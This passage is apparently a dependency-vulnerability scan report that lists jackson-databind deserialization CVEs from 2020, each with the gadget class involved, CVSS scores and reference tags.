af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-24750 suppress
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-35490 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-35491 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36179 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MITIGATION,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36180 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36181 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36182 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36183 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36184 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36185 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36186 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36187 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36188 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36189 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
